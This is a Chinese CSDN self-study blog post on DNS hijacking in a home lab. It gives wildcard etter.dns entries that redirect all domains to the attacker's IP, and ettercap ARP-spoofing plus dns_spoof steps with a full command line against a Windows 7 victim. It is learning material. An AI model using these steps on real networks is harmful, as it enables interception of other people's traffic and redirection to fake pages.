linux 自学日记—— DNS劫持

最新推荐文章于 2024-04-29 09:05:42 发布
最新推荐文章于 2024-04-29 09:05:42 发布
阅读量2.4k 收藏 4
点赞数
分类专栏: 小白进阶 文章标签: 爱唱晚 kali自学
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42319613/article/details/81137948
版权


攻击者     kali     ip:192.168.5.128
受迫者      win7     ip:192.168.5.129

首先配置ettercap
leafpad /etc/ettercap/etter.dns

*    A    192.168.5.128
*.com    A    192.168.5.128
*.cn    A    192.168.5.128
*.org    A    192.168.5.128

设置劫持后网页模样
leafpad /var/www/index.html

service apache2 start  
(启动apache2 服务器)

1、ettercap -G
(开启ettercap )

选择dns_spoof插件

sniff eth0选项,打开host list 搜索host ,添加网关和相应的机器

机器加入到攻击者1 网管加入到攻击者2 然后选择中间人攻击arp

勾选sniff remote connections已达到监听的目的。

start sniff  开始攻击

2、ettercap -T -q -i eth0 -P dns_spoof -M arp /192.168.5.2/ /192.168.5.129/

Acw_power
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux下实现域名劫持
08-26
linux上实现的一个用C编写的域名劫持功能,可以截取在此linux机器上转发的DNS报文并修改内容,实现域名劫持的功能。
Kali Linux之ARP欺骗和DNS劫持
m0re's blog
03-14 2629
前言 哇,想想一个月之前,小煤球学长给我说知不知道ARP欺骗,然后让我有空学一下,结果拖到现在,也差不多一个多月了,现在才有空看一下。学习一下…… 什么是ARP欺骗? 前置工具 kali中的arpspoof 直接安装dsniff //root用户使用 apt-get install dsniff //普通用户使用 sudo apt-get install dsniff dsniff中含有arpspoof,urlsnarf 本地靶机实现 首先要知道目标主机的IP地址和网关,这里以win7作为受害者机器, 前
信息化工作人员必备常识10——DNS劫持【原理与案例讲解】
最新发布
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
04-29 945
日常生活中,偶尔会遇到打开百度网站却跳转到了另一个广告网站(yellow网这种情况特别多,相信大家都有这种经历~) 其实这个就是DNS劫持,也就是==把目标网站域名解析到错误的IP地址上==。 这时可以重新把DNS地址设置成网络运营商提供的IP地址,或者设置成公共DNS服务器IP地址,使用权威的DNS地址。就像你买衣服一样的,去商场买名牌,尽量不去买质量和服务都不靠谱的地摊货。 ①DNS的解析决定的是我们的域名将解析到哪一个IP地址的记录,是基于UDP协议的一种应用层协议。
linux dns劫持转发,linuxdns劫持(解决方案)
weixin_29365481的博客
05-13 384
如何解决linux dns劫持?1.首先如何确定是否被劫持:那么查询一个并不存在的域名nslookup mmmmm.happy如果返回了一个ip地址,说明dns劫持了,假设此ip地址为:123.34.5.6那么用8.8.8.8域名服务器解析一下此错误域名试试:nslookup mmmmm.happy 8.8.8.8输出的内容如下:[root@master etc]# nslookup mmmm...
Linux dns劫持程序,linuxdns劫持(解决方案)
weixin_32836221的博客
05-04 864
如何解决linux dns劫持?1.首先如何确定是否被劫持:那么查询一个并不存在的域名nslookup mmmmm.happy如果返回了一个ip地址,说明dns劫持了,假设此ip地址为:123.34.5.6那么用8.8.8.8域名服务器解析一下此错误域名试试:nslookup mmmmm.happy 8.8.8.8输出的内容如下:[root@master etc]# nslookup mmmm...
什么是域名劫持和域名污染
08-03 612
域名劫持 域名服务器上都会保存一大堆的域名记录(每条记录包含“域名”和“IP地址”)。当收到域名查询的时候,域名服务器会从这堆记录中找到对方想要的,然后回应给对方。 如果域名服务器上的某条记录被【人为修改】了(改成错的),那么一旦要查询这条记录,得到的就是错误的结果。这种情...
GPU编程自学10——流并行
02-25
传统的中央处理器(CPU,CentralProcessingUnit)内部结构异常复杂,主要是因为其需要很强的通用性来处理各种不同的数据类型,同时又要逻辑判断又会引入大量的分支跳转和中断的处理。为了提高计算能力,CPU通常会采取...
FPGA自学笔记——设计与验证公开版
02-12
FPGA自学笔记——设计与验证公开版;十分适合初学者使用
linux自学教程1.0版——DMC出品1
08-04
0.写在前面时隔半年,我们中国人民大学数据挖掘中心整理以往提供的 linux 教程以及学生们在实际使用 linux 中获得的经验与教训,发布了全新的基于 ubu
如何自学嵌入式——嵌入式学习路线
07-18
如何自学嵌入式?嵌入式学习路线 一般的应用开发,例如桌面应用的开发,移动应用的开发,通常都是在一个IDE集成开发环境中完成。 开发者,熟悉了IDE的使用,熟悉了相关应用编程接口API,就能开发应用了。不需要关心...
linux dns劫持转发,linuxdns劫持
weixin_39778003的博客
05-13 195
環境:ubuntu16.04解說:ubuntu使用dnsmasq獲取要解析的網站ip,dnsmasq通過域名服務器獲取網站ip,並將ip緩存起來,那么就可以減少對外網域名服務器的訪問,從而可以使系統迅速地獲取ip今天遇到dns劫持的情況,在此記錄一下:1.首先如何確定是否被劫持:那么查詢一個並不存在的域名nslookup notexit.comrrrr如果返回了一個ip地址,說明dns劫持了,...
域名劫持
weixin_33966365的博客
03-12 55
转载于:https://www.cnblogs.com/xinghen1216/p/8548323.html
linux安装docker并搭建DNS服务器,劫持百度小实验
weixin_44600810的博客
11-28 859
一、安装docker [菜鸟程序centos安装教程](https://www.runoob.com/docker/centos-docker-install.html) systemctl start docker // 启动docker docker -v //检测docker是否安装成功 二、docker常用命令 docker images //查看镜像 docker ps all //查看容器 docker stop vsftpd //暂停了names为vsftpd的容器 docker s
linux dns 对外攻击,各种的常见dns攻击手法和dns劫持解决方法
weixin_36403956的博客
05-13 874
DNS是网络连接的重要一环。其任务是将域名转化为网络地址,然后根据转化后的地址进行连接。然而,在这一过程中,攻击者却有丰富多样的攻击手段,各种常见攻击手法都能在DNS协议上做到复制。IIS7网站监控可以及时防控网站风险,快速准确监控网站是否遭到各种劫持攻击,网站在全国是否能正常打开(查看域名是否被墙),精准的DNS污染检测,具备网站打开速度检测功能,第一时间知道网站是否被黑、被入侵、被改标题、被挂...
linux 域名劫持,域名被劫持处理方案
weixin_36374105的博客
05-13 1020
首先简单说下什么是域名劫持,域名劫持就是在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则直接返回假的IP地址或者什么也不做使得请求失去响应,其效果就是对特定的网址不能访问或访问的是假网址。怎么解决呢?很简单,域名劫持对于https是无效的,他只能劫持80端口,下面详细介绍一下怎么解决。1,确定被劫持的域名2,把该域名及网站放到装有宝塔面板的linux服务器上3,...
Linux:设置/修改linux主机名+hosts映射+主机名解析机制分析+DNS域名劫持
wo12369874的博客
11-06 3591
Linux:设置/修改linux主机名+hosts映射+主机名解析机制分析+DNS域名劫持
Linux系统下搭建DNS服务器——DNS原理总结
刘彦的博客
03-09 2万+
2017-01-07 整理 DNS原理域名到IP地址的解析过程IP地址到域名的反向域名解析过程抓包分析DNS报文和具体解析过程DNS服务器搭建和配置 这个东东也是今年博主参见校招的时候被很多公司问过的,虽然理论性比较强,但是作为一个程序员,个人认为熟悉DNS是非常重要的,要理解它并能帮助解决一些实际问题。 面试实录 打开一个URL,在网络层面都发生了哪些事情?(当中说到了D
域名劫持原理及实现
热门推荐
vivianliulu的博客
06-28 4万+
目录 1.从输入URL到页面加载发生了什么 2 1.1 DNS解析 2 1.2 TCP连接 2 1.3 发送HTTP请求 2 1.4 服务器处理请求并返回HTTP报文 2 1.5 浏览器解析渲染页面 3 1.6 连接结束 4 2.dns劫持 4 3.url 重定向 6 3.1. 前端实现 6 3.1.1 html 页面跳转方式 6 3.1.2 JS 页面
python自学第8天字典_python自学日记7——字典
05-26
好的,今天我们来学习Python中的字典(Dictionary)。 字典是一种无序的、可变的数据类型,它以键值对(key-value)的形式存储数据,其中键(key)必须是唯一的,而值(value)可以是任意数据类型。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值